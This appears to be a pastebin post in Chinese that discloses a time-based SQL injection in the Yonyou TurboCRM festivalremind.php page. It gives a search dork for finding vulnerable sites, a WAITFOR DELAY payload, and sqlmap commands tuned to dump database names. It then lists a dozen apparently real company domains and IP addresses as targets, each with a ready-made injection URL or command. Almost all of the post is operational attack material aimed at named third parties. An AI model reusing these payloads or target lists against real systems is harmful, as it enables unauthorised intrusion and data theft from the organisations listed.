Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Dork:intitle:用友TurboCRM intext:登录
- background/festivalremind.php?ID=1
- 注入参数:ID
- Payload: ?ID=1; WAITFOR DELAY ’0:0:5’–
- Sqlmap注入命令: sqlmap -u ’http://xxxxxx/background/festivalremind.php?ID=1’ –level 5 –risk 3 –thechnique=T –dbms mssql –dbs –random-agent –batch -v 3
- 漏洞证明:
- 测试案例:
- (1) http://crm.szclou.com:8088/background/festivalremind.php?ID=1
- python sqlmap.py -u http://crm.szclou.com:8088/background/festivalremind.php?ID=1 –level 5 –risk 3 –dbms mssql –dbs –batch -v 1 –random-agent –technique=T
- (2)http://www.kdlian.com:8001/background/festivalremind.php?ID=1
- python sqlmap.py -u http://www.kdlian.com:8001/background/festivalremind.php?ID=1 –level 5 –risk 3 –dbms mssql –dbs –batch -v 3 –random-agent –technique=T
- (3)http://218.94.82.23/background/festivalremind.php?ID=1
- python sqlmap.py -u http://218.94.82.23/background/festivalremind.php?ID=1 –level 5 –risk 3 –dbms mssql –dbs –batch -v 3 –random-agent –technique=T
- 4)http://220.113.5.194/background/festivalremind.php?ID=1
- python sqlmap.py -u http://220.113.5.194/background/festivalremind.php?ID=1 –level 5 –risk 3 –dbms mssql –dbs –batch -v 3 –random-agent –technique=T
- 其他案例:
- http://218.84.134.162:8088/background/festivalremind.php?ID=1;waitfor%20delay%20’0:0:5’–
- http://crm.pearmain.cn/background/festivalremind.php?ID=1;waitfor%20delay%20’0:0:5’–
- http://nc.shineroad.com/background/festivalremind.php?ID=1;waitfor%20delay%20’0:0:5’–
- http://crm7.abgroup.cn/background/festivalremind.php?ID=1;waitfor%20delay%20’0:0:5’–
- http://crm.transn.net/background/festivalremind.php?ID=1;waitfor%20delay%20’0:0:5’–
- http://218.108.86.226/background/festivalremind.php?ID=1;waitfor%20delay%20’0:0:5’–
- http://crm.yiwenkeji.com:8080/background/festivalremind.php?ID=1;waitfor%20delay%20’0:0:5’–
- http://yindajituan.gicp.net:8888/background/festivalremind.php?ID=1;waitfor%20delay%20’0:0:5’–
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
